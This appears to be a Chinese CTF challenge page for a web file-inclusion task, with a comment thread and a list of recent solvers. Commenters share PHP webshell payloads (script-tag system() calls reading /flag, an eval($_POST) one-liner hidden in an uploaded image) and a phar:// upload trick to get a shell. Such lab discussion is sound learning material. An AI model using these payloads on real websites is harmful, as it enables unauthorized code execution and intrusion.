文件包含2WEB 未解决

分数: 35 金币: 4
题目作者: 未知
一  血: dotast
一血奖励: 3金币
解  决: 4496
提  示: 文件包含
描  述:
文件包含2
评论
wINFerno 4年前

这题目我使用蚁剑连接不上,就写了<script language="php" >system('ls -al /')</script>查看目录 <script language="php" >system('tac /flag')</script>找到flag

回复 1

zhou0626 4年前

用蚁剑看了眼发现flag文件被放到了根目录

回复 0

andrewlong 4年前

/flag ??????

回复 2
守得云开见月明 4年前

@思南you flag是直接存放在根目录下的

回复 0

思南you 4年前

这是什么原理大佬

回复 0

王大发财 4年前

一个一个传的<script language=php>system("cat ../../../flag")</script>

回复 0

onerm 4年前

猜了一下,直接/flag。。。

回复 0

陈江川0118 4年前

无非就是换了个写一句话木马方式

回复 0

yes1yi 4年前

有人把flag删掉了?

回复 3

a2cai 4年前

不是很懂,试过<?php @eval($_POST['shell'])?>放到jpg里,然后上传后包含它,打开F12发现它其实会echo它?但会对一些字符进行转换啥的,我试的<?php和?>会转换成 _ ,然后 < 和 > 分别转换为<!-- 和-->,就不知道为啥用<script language='php'>@eval($_POST[

回复 0

yswdlll 4年前

phar能把压缩文件解压读取,即使这个压缩文件的后缀名改了也可以。。所以上传一个getshell的压缩文件,后缀名改成jpg或者其他。。然后通过phar://读取

回复 2
onerm 4年前

学到了

回复 0

ycfhw1 4年前

flag没被删,只是换了位置而已,这么看的话,还是连菜刀查找效率更高

回复 0
hoshino 4年前

哥连不上

回复 0

WriteUp

image
harry

4 金币

评分(5)

解题动态

Mori. 攻破了该题 2天前
peaceminus1 攻破了该题 3天前
violet1 攻破了该题 3天前
Wu. 攻破了该题 3天前
Jazz888 攻破了该题 4天前
ugnfc 攻破了该题 7天前
hdcc1 攻破了该题 7天前
kiritoldws 攻破了该题 11天前
xyqsin 攻破了该题 13天前
19113115774 攻破了该题 13天前
无情的白给机器人 攻破了该题 15天前
yuanqinhe0123456789 攻破了该题 15天前
flag大王 攻破了该题 16天前
XF003C 攻破了该题 17天前
evilk 攻破了该题 17天前
等往事风中吹‘ 攻破了该题 17天前
爱意藏入虚空 攻破了该题 17天前
一定要做这些吗 攻破了该题 17天前
r1ng_13 攻破了该题 18天前
jsbba 攻破了该题 20天前
问题反馈